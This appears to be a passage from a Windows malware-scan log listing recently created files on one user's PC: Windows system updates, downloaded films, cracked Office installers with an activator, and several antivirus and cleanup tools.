2016-03-02 13:25 - 2016-02-23 20:40 - 00430944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-03-02 13:25 - 2016-02-23 20:39 - 00502112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupEngine.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 02180136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 00980352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfasfsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 00895080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 00882720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 00450912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFCaptureEngine.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 00420928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvproc.dll
2016-03-02 13:25 - 2016-02-23 20:37 - 00713824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
2016-03-02 13:25 - 2016-02-23 20:32 - 00791744 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-03-02 13:25 - 2016-02-23 20:30 - 02919320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-03-02 13:25 - 2016-02-23 20:27 - 00376536 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.MediaControl.dll
2016-03-02 13:25 - 2016-02-23 20:25 - 00534368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2016-03-02 13:25 - 2016-02-23 20:20 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\XblGameSave.dll
2016-03-02 13:25 - 2016-02-23 20:20 - 00238592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\xboxgip.sys
2016-03-02 13:25 - 2016-02-23 20:19 - 00029696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\xinputhid.sys
2016-03-02 13:25 - 2016-02-23 20:17 - 00649216 _____ (Microsoft Corporation) C:\Windows\system32\ngcsvc.dll
2016-03-02 13:25 - 2016-02-23 20:12 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\provpackageapidll.dll
2016-03-02 13:25 - 2016-02-23 20:10 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\WiFiConfigSP.dll
2016-03-02 13:25 - 2016-02-23 20:07 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\LaunchWinApp.exe
2016-03-02 13:25 - 2016-02-23 20:07 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\wlansvcpal.dll
2016-03-02 13:25 - 2016-02-23 20:06 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\flvprophandler.dll
2016-03-02 13:25 - 2016-02-23 20:01 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2016-03-02 13:25 - 2016-02-23 20:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-03-02 13:25 - 2016-02-23 20:00 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\wfdprov.dll
2016-03-02 13:25 - 2016-02-23 19:58 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-03-02 13:25 - 2016-02-23 19:58 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\irmon.dll
2016-03-02 13:25 - 2016-02-23 19:57 - 00199168 _____ (Microsoft Corporation) C:\Windows\system32\InstallAgent.exe
2016-03-02 13:25 - 2016-02-23 19:56 - 02186864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll
2016-03-02 13:25 - 2016-02-23 19:55 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bridge.sys
2016-03-02 13:25 - 2016-02-23 19:53 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\srpapi.dll
2016-03-02 13:25 - 2016-02-23 19:53 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\ngckeyenum.dll
2016-03-02 13:25 - 2016-02-23 19:52 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\MDMAppInstaller.exe
2016-03-02 13:25 - 2016-02-23 19:50 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
2016-03-02 13:25 - 2016-02-23 19:48 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\AppCapture.dll
2016-03-02 13:25 - 2016-02-23 19:48 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\TimeBrokerClient.dll
2016-03-02 13:25 - 2016-02-23 19:40 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\SMSRouter.dll
2016-03-02 13:25 - 2016-02-23 19:39 - 00178176 _____ (Microsoft Corporation) C:\Windows\system32\psmsrv.dll
2016-03-02 13:25 - 2016-02-23 19:38 - 00320000 _____ (Microsoft Corporation) C:\Windows\system32\MSFlacDecoder.dll
2016-03-02 13:25 - 2016-02-23 19:38 - 00287712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.MediaControl.dll
2016-03-02 13:25 - 2016-02-23 19:37 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\StorSvc.dll
2016-03-02 13:25 - 2016-02-23 19:37 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\DisplayManager.dll
2016-03-02 13:25 - 2016-02-23 19:37 - 00204288 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupSvc.dll
2016-03-02 13:25 - 2016-02-23 19:36 - 00216576 _____ (Microsoft Corporation) C:\Windows\system32\QuickActionsDataModel.dll
2016-03-02 13:25 - 2016-02-23 19:34 - 00305664 _____ (Microsoft Corporation) C:\Windows\system32\wifiprofilessettinghandler.dll
2016-03-02 13:25 - 2016-02-23 19:34 - 00189952 _____ (Microsoft Corporation) C:\Windows\system32\WiFiDisplay.dll
2016-03-02 13:25 - 2016-02-23 19:33 - 00558080 _____ (Microsoft Corporation) C:\Windows\system32\MBMediaManager.dll
2016-03-02 13:25 - 2016-02-23 19:32 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\bcastdvr.exe
2016-03-02 13:25 - 2016-02-23 19:31 - 00463360 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
2016-03-02 13:25 - 2016-02-23 19:29 - 00591872 _____ (Microsoft Corporation) C:\Windows\system32\SmsRouterSvc.dll
2016-03-02 13:25 - 2016-02-23 19:27 - 00307712 _____ (Microsoft Corporation) C:\Windows\system32\usbmon.dll
2016-03-02 13:25 - 2016-02-23 19:26 - 00372224 _____ (Microsoft Corporation) C:\Windows\system32\MDEServer.exe
2016-03-02 13:25 - 2016-02-23 19:23 - 00412672 _____ (Microsoft Corporation) C:\Windows\system32\wlanmsm.dll
2016-03-02 13:25 - 2016-02-23 19:22 - 00567808 _____ (Microsoft Corporation) C:\Windows\system32\MCRecvSrc.dll
2016-03-02 13:25 - 2016-02-23 19:20 - 00847360 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2016-03-02 13:25 - 2016-02-23 19:20 - 00606720 _____ (Microsoft Corporation) C:\Windows\system32\wcmsvc.dll
2016-03-02 13:25 - 2016-02-23 19:20 - 00493568 _____ (Microsoft Corporation) C:\Windows\system32\mfmkvsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 19:20 - 00330240 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-02 13:25 - 2016-02-23 19:19 - 00948736 _____ (Microsoft Corporation) C:\Windows\system32\XblAuthManager.dll
2016-03-02 13:25 - 2016-02-23 19:19 - 00517632 _____ (Microsoft Corporation) C:\Windows\system32\winspool.drv
2016-03-02 13:25 - 2016-02-23 19:18 - 00557056 _____ (Microsoft Corporation) C:\Windows\system32\PsmServiceExtHost.dll
2016-03-02 13:25 - 2016-02-23 19:14 - 00828928 _____ (Microsoft Corporation) C:\Windows\system32\Windows.AccountsControl.dll
2016-03-02 13:25 - 2016-02-23 19:14 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LaunchWinApp.exe
2016-03-02 13:25 - 2016-02-23 19:12 - 00852480 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.dll
2016-03-02 13:25 - 2016-02-23 19:11 - 00587776 _____ (Microsoft Corporation) C:\Windows\system32\bisrv.dll
2016-03-02 13:25 - 2016-02-23 19:10 - 00997376 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2016-03-02 13:25 - 2016-02-23 19:10 - 00474624 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupShim.dll
2016-03-02 13:25 - 2016-02-23 19:09 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\SharedStartModel.dll
2016-03-02 13:25 - 2016-02-23 19:09 - 00870400 _____ (Microsoft Corporation) C:\Windows\system32\modernexecserver.dll
2016-03-02 13:25 - 2016-02-23 19:06 - 01213440 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2016-03-02 13:25 - 2016-02-23 19:05 - 00161280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallAgent.exe
2016-03-02 13:25 - 2016-02-23 19:04 - 01131520 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Audio.dll
2016-03-02 13:25 - 2016-02-23 19:04 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.dll
2016-03-02 13:25 - 2016-02-23 19:04 - 00382464 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2016-03-02 13:25 - 2016-02-23 19:02 - 01318912 _____ (Microsoft Corporation) C:\Windows\system32\wifinetworkmanager.dll
2016-03-02 13:25 - 2016-02-23 19:02 - 00755712 _____ (Microsoft Corporation) C:\Windows\system32\spoolsv.exe
2016-03-02 13:25 - 2016-02-23 19:02 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-03-02 13:25 - 2016-02-23 18:58 - 00175616 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Core.TextInput.dll
2016-03-02 13:25 - 2016-02-23 18:58 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\TimeBrokerServer.dll
2016-03-02 13:25 - 2016-02-23 18:58 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\InputLocaleManager.dll
2016-03-02 13:25 - 2016-02-23 18:57 - 00031744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TimeBrokerClient.dll
2016-03-02 13:25 - 2016-02-23 18:52 - 00456704 _____ (Microsoft Corporation) C:\Windows\system32\ipnathlp.dll
2016-03-02 13:25 - 2016-02-23 18:50 - 00266752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSFlacDecoder.dll
2016-03-02 13:25 - 2016-02-23 18:49 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DisplayManager.dll
2016-03-02 13:25 - 2016-02-23 18:48 - 00838144 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
2016-03-02 13:25 - 2016-02-23 18:47 - 00157184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WiFiDisplay.dll
2016-03-02 13:25 - 2016-02-23 18:38 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MCRecvSrc.dll
2016-03-02 13:25 - 2016-02-23 18:37 - 01118208 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-03-02 13:25 - 2016-02-23 18:37 - 00613376 _____ (Microsoft Corporation) C:\Windows\system32\SettingSync.dll
2016-03-02 13:25 - 2016-02-23 18:36 - 00713728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2016-03-02 13:25 - 2016-02-23 18:36 - 00379392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmkvsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 18:36 - 00250880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-02 13:25 - 2016-02-23 18:35 - 00400896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winspool.drv
2016-03-02 13:25 - 2016-02-23 18:31 - 00585216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.AccountsControl.dll
2016-03-02 13:25 - 2016-02-23 18:30 - 00646656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll
2016-03-02 13:25 - 2016-02-23 18:29 - 00349696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupShim.dll
2016-03-02 13:25 - 2016-02-23 18:28 - 00555520 _____ (Microsoft Corporation) C:\Windows\system32\SyncController.dll
2016-03-02 13:25 - 2016-02-23 18:28 - 00256512 _____ (Microsoft Corporation) C:\Windows\system32\accountaccessor.dll
2016-03-02 13:25 - 2016-02-23 18:24 - 04827136 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-03-02 13:25 - 2016-02-23 18:24 - 01105920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Audio.dll
2016-03-02 13:25 - 2016-02-23 18:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.dll
2016-03-02 13:25 - 2016-02-23 18:21 - 00133632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Core.TextInput.dll
2016-03-02 13:25 - 2016-02-23 18:20 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputLocaleManager.dll
2016-03-02 13:25 - 2016-02-23 18:17 - 02635264 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Logon.dll
2016-03-02 13:25 - 2016-02-23 18:14 - 00990720 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncCore.dll
2016-03-02 13:25 - 2016-02-23 18:11 - 01390080 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Shell.dll
2016-03-02 13:25 - 2016-02-23 18:05 - 00503296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSync.dll
2016-03-02 13:25 - 2016-02-23 18:01 - 02295808 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2016-03-02 13:25 - 2016-02-23 17:58 - 00450560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SyncController.dll
2016-03-02 13:25 - 2016-02-23 17:56 - 04412928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-03-02 13:25 - 2016-02-23 17:53 - 01799168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Logon.dll
2016-03-02 13:25 - 2016-02-23 17:51 - 00754176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncCore.dll
2016-03-02 13:25 - 2016-02-23 17:42 - 03425792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.dll
2016-03-02 13:25 - 2016-02-23 17:41 - 02912256 _____ (Microsoft Corporation) C:\Windows\system32\CertEnroll.dll
2016-03-02 13:25 - 2016-02-23 17:39 - 02581504 _____ (Microsoft Corporation) C:\Windows\system32\MFMediaEngine.dll
2016-03-02 13:25 - 2016-02-23 17:35 - 07533568 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2016-03-02 13:25 - 2016-02-23 17:33 - 02604032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CertEnroll.dll
2016-03-02 13:25 - 2016-02-23 17:32 - 02793472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.dll
2016-03-02 13:25 - 2016-02-23 17:30 - 02061312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFMediaEngine.dll
2016-03-02 13:25 - 2016-02-23 17:28 - 06740992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2016-03-02 13:25 - 2016-02-09 15:28 - 00277856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2016-03-02 13:25 - 2016-02-09 15:13 - 00185184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2016-03-02 13:25 - 2016-02-09 14:18 - 00297472 _____ (Microsoft Corporation) C:\Windows\system32\thumbcache.dll
2016-03-02 13:25 - 2016-02-09 14:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\thumbcache.dll
2016-03-02 13:25 - 2016-02-09 14:07 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\DeviceEnroller.exe
2016-03-01 19:03 - 2016-03-01 20:20 - 890443799 ____R C:\Users\kevin\Downloads\Crouching.Tiger.Hidden.Dragon.Sword.of.Destiny.2016.720p.HDRiP.850MB.ShAaNiG.mkv
2016-03-01 19:02 - 2016-03-01 20:11 - 00000000 ____D C:\Users\kevin\Downloads\Spotlight 2015 1080p BluRay x264 DTS-JYK
2016-03-01 17:18 - 2016-03-08 14:09 - 00000000 ____D C:\ProgramData\KMSAutoS
2016-03-01 17:18 - 2016-03-01 17:18 - 00003786 _____ C:\Windows\System32\Tasks\KMSAutoNet
2016-03-01 17:17 - 2016-03-01 17:19 - 00000000 ____D C:\Users\kevin\AppData\Local\MSfree Inc
2016-03-01 12:58 - 2016-03-01 12:58 - 00002534 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002498 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002493 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002492 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002456 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002455 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002449 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00002435 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2016-03-01 12:58 - 2016-03-01 12:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools
2016-03-01 12:56 - 2016-03-02 12:03 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-03-01 12:56 - 2016-03-01 12:56 - 00000000 ____D C:\Users\kevin\AppData\Roaming\WinRAR
2016-03-01 12:56 - 2016-03-01 12:56 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-03-01 12:56 - 2016-03-01 12:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-03-01 12:56 - 2016-03-01 12:56 - 00000000 ____D C:\Program Files\WinRAR
2016-03-01 12:56 - 2016-03-01 12:56 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-03-01 12:55 - 2016-03-01 12:56 - 01992496 _____ C:\Users\kevin\Downloads\winrar-x64-531.exe
2016-03-01 12:40 - 2016-03-01 12:43 - 00000000 ____D C:\Users\kevin\Downloads\MICROSOFT Office PRO Plus 2016 v16.0.4266.1003 RTM + Activator [TechTools.NET]
2016-03-01 12:38 - 2016-03-01 12:38 - 00164123 _____ C:\Users\kevin\Downloads\Resume[Kevin_Li].pdf
2016-03-01 12:03 - 2016-03-01 12:03 - 00024333 _____ C:\Users\kevin\Downloads\TPPN-104.torrent
2016-02-24 20:05 - 2016-03-08 16:35 - 00000000 ____D C:\Program Files (x86)\SpeedFan
2016-02-24 20:05 - 2016-02-24 20:05 - 02218504 _____ C:\Users\kevin\Downloads\instspeedfan451.exe
2016-02-24 20:05 - 2016-02-24 20:05 - 00001080 _____ C:\Users\kevin\Desktop\SpeedFan.lnk
2016-02-24 20:05 - 2016-02-24 20:05 - 00000045 _____ C:\Windows\SysWOW64\initdebug.nfo
2016-02-24 20:05 - 2016-02-24 20:05 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan
2016-02-24 19:54 - 2016-03-03 16:48 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Avira
2016-02-24 19:53 - 2016-02-17 08:41 - 00146704 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2016-02-24 19:53 - 2016-02-17 08:41 - 00135880 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2016-02-24 19:53 - 2016-02-17 08:41 - 00073032 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2016-02-24 19:53 - 2016-02-17 08:41 - 00035488 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2016-02-24 19:50 - 2016-02-24 19:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2016-02-24 19:50 - 2016-02-24 19:53 - 00000000 ____D C:\ProgramData\Avira
2016-02-24 19:50 - 2016-02-24 19:53 - 00000000 ____D C:\Program Files (x86)\Avira
2016-02-24 19:50 - 2016-02-24 19:50 - 05404312 _____ (Avira Operations GmbH & Co. KG) C:\Users\kevin\Downloads\avira_en_av_56cd6eb2098ca__ws.exe
2016-02-24 19:50 - 2016-02-24 19:50 - 00001283 _____ C:\Users\Public\Desktop\Avira Launcher.lnk
2016-02-23 23:41 - 2016-02-23 23:42 - 00262326 _____ C:\TDSSKiller.3.1.0.9_23.02.2016_23.41.45_log.txt
2016-02-23 23:41 - 2016-02-23 23:41 - 04727984 _____ (Kaspersky Lab ZAO) C:\Users\kevin\Downloads\tdsskiller.exe
2016-02-23 23:39 - 2016-02-23 23:41 - 05658013 _____ (Swearware) C:\Users\kevin\Downloads\ComboFix.exe
2016-02-23 23:39 - 2016-02-23 23:40 - 02032072 _____ (Bleeping Computer, LLC) C:\Users\kevin\Downloads\rkill.exe
2016-02-23 23:38 - 2016-02-23 23:38 - 00000000 ____D C:\Users\kevin\Downloads\backups
2016-02-23 23:35 - 2016-02-23 23:35 - 00000000 ____D C:\Users\kevin\AppData\Roaming\AVG
2016-02-23 23:34 - 2016-02-24 13:49 - 00000000 ____D C:\Windows\Minidump
2016-02-23 23:33 - 2016-02-23 23:33 - 00000000 ____D C:\Users\kevin\AppData\Roaming\TuneUp Software
2016-02-23 23:29 - 2016-03-03 16:47 - 00000000 ____D C:\ProgramData\MFAData
2016-02-23 23:29 - 2016-02-23 23:29 - 01511936 _____ C:\Users\kevin\Downloads\AdwCleaner.exe
2016-02-23 23:29 - 2016-02-23 23:29 - 00000000 ____D C:\Users\kevin\AppData\Local\MFAData
2016-02-23 23:28 - 2016-03-03 16:47 - 00000000 ____D C:\ProgramData\Avg
2016-02-23 23:28 - 2016-02-24 19:50 - 00000000 ____D C:\Program Files (x86)\AVG
2016-02-23 23:27 - 2016-02-24 19:50 - 00000000 ____D C:\Users\kevin\AppData\Local\AvgSetupLog
2016-02-23 23:27 - 2016-02-23 23:31 - 00000000 ____D C:\Users\kevin\AppData\Local\Avg
2016-02-23 23:27 - 2016-02-23 23:27 - 02979296 _____ (AVG Technologies CZ, s.r.o.) C:\Users\kevin\Downloads\AVG_Protection_Free_1025.exe
2016-02-23 23:21 - 2016-02-23 23:21 - 00000000 ____D C:\Windows\system32\appmgmt
2016-02-23 23:08 - 2016-02-23 23:09 - 00000000 ____D C:\Users\kevin\Downloads\Sherlock.S03.720p.BluRay.x264.ShAaNiG
2016-02-23 23:07 - 2016-02-23 23:33 - 00000000 ____D C:\Users\kevin\Downloads\The.Walking.Dead.S06E10.PROPER.720p.HDTV.x264-KILLERS[ettv]
2016-02-23 23:00 - 2016-02-23 23:00 - 00001406 _____ C:\Windows\SysWOW64\soft.exe
2016-02-21 20:11 - 2016-02-21 20:44 - 544641959 _____ C:\Users\kevin\Downloads\TWD S06E09-No Way Out (2016) 720p HDTV x264 AAC Cknz (Eng Subs).mkv
2016-02-21 12:20 - 2016-02-21 12:20 - 00003882 _____ C:\Windows\System32\Tasks\{8D2053D8-20E4-3EA4-F40B-3B75A24CA541}
2016-02-21 12:20 - 2016-02-21 12:20 - 00000000 ____D C:\Users\kevin\AppData\Roaming\NVIDIA
2016-02-17 20:19 - 2016-02-17 20:22 - 00000000 ____D C:\Users\kevin\AppData\Roaming\DAEMON Tools Lite
2016-02-17 20:19 - 2016-02-17 20:19 - 00047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2016-02-17 20:19 - 2016-02-17 20:19 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2016-02-17 20:19 - 2016-02-17 20:19 - 00000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2016-02-17 20:19 - 2016-02-17 20:19 - 00000000 ____D C:\Users\kevin\AppData\Local\Disc_Soft_Ltd
2016-02-17 20:18 - 2016-02-17 20:18 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2016-02-17 20:17 - 2016-02-17 20:17 - 01203634 _____ ( ) C:\Windows\SysWOW64\lnsecsl.exe
2016-02-17 20:15 - 2016-02-17 02:25 - 00000001 _____ C:\Users\kevin\AppData\Roaming\write 1234
2016-02-16 21:51 - 2016-02-16 21:51 - 00000000 ____D C:\Users\kevin\Downloads\Microsoft Office 2013 Professional Plus.(Full)
2016-02-16 20:46 - 2016-02-16 20:46 - 02437120 _____ C:\Users\kevin\Downloads\Copy of TAX-Critical-File.xls
2016-02-14 18:39 - 2016-02-14 18:46 - 00000000 ____D C:\Users\kevin\Downloads\Sicario 2015 1080p BluRay x264 AC3-JYK
2016-02-14 18:39 - 2016-02-14 18:44 - 00000000 ____D C:\Users\kevin\Downloads\Bridge of Spies 2015 1080p BluRay x264 DTS-JYK
2016-02-10 17:16 - 2016-01-29 17:57 - 04502352 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-02-10 17:16 - 2016-01-29 17:33 - 04064320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-02-10 17:16 - 2016-01-27 16:59 - 00304752 _____ (Microsoft Corporation) C:\Windows\system32\systemreset.exe
2016-02-10 17:16 - 2016-01-27 16:57 - 01824264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-02-10 17:16 - 2016-01-27 16:57 - 00820704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-02-10 17:16 - 2016-01-27 16:55 - 00081112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OpenWith.exe
2016-02-10 17:16 - 2016-01-27 16:46 - 02606824 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-02-10 17:16 - 2016-01-27 16:46 - 01270072 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-02-10 17:16 - 2016-01-27 16:44 - 00604928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-02-10 17:16 - 2016-01-27 16:44 - 00085320 _____ (Microsoft Corporation) C:\Windows\system32\OpenWith.exe
2016-02-10 17:16 - 2016-01-27 16:21 - 00162816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-02-10 17:16 - 2016-01-27 16:15 - 00031232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ztrace_maps.dll
2016-02-10 17:16 - 2016-01-27 16:11 - 00118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-02-10 17:16 - 2016-01-27 16:10 - 00099840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-02-10 17:16 - 2016-01-27 16:08 - 00299008 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-02-10 17:16 - 2016-01-27 16:08 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\ztrace_maps.dll
2016-02-10 17:16 - 2016-01-27 16:07 - 00203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iassam.dll
2016-02-10 17:16 - 2016-01-27 16:04 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-02-10 17:16 - 2016-01-27 16:02 - 00109056 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-02-10 17:16 - 2016-01-27 16:01 - 00792064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-02-10 17:16 - 2016-01-27 15:59 - 00258048 _____ (Microsoft Corporation) C:\Windows\system32\iassam.dll
2016-02-10 17:16 - 2016-01-27 15:52 - 00970752 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-02-10 17:16 - 2016-01-27 15:50 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-02-10 17:16 - 2016-01-27 15:44 - 00063488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-02-10 17:16 - 2016-01-27 15:42 - 01387520 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-02-10 17:16 - 2016-01-27 15:32 - 01087488 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll
